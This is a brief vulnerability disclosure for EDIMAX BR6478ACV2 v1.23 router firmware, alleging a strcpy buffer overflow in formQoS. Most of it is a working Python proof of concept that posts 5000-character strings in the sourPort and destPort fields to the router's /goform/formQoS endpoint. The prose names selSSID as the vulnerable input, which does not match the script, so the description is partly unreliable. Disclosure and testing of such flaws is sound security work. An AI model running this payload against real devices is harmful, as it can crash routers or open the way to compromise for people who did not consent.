BR6478ACV2_v1.23
The EDIMAX BR6478ACV2_v1.23 firmware has a buffer overflow vulnerability in the formQoS function. The v3 variables receive the selSSID parameters from a POST request. However, since the user can control the input of these variables, the statement strcpy(); can cause a buffer overflow.
import requests
ip = "192.168.2.1"
payload = "A"*5000
data = {
"EZQos_Mode": "",
"addQos": "1",
"editQos": "",
"configWan": "1",
"configNum": "",
"isEnabled": "",
"ruleName": "test",
"bwidthVal": "100",
"bwidthType": "0",
"downUpType": "0",
"nettype": "",
"sourType": "0",
"sourStIp": "192.168.1.100",
"sourEdIp": "192.168.1.200",
"destStIp": "192.168.1.100",
"destEdIp": "192.168.1.200",
"sourMac": "",
"trafType": "0",
"protocol": "0",
"sourPort": payload,
"destPort": payload,
"diffSevType": "",
"downVal": "",
"downType": "",
"portValue": "",
}
url = f'http://{ip}/goform/formQoS'
res = requests.post(url=url, data=data, verify=False)
print(res)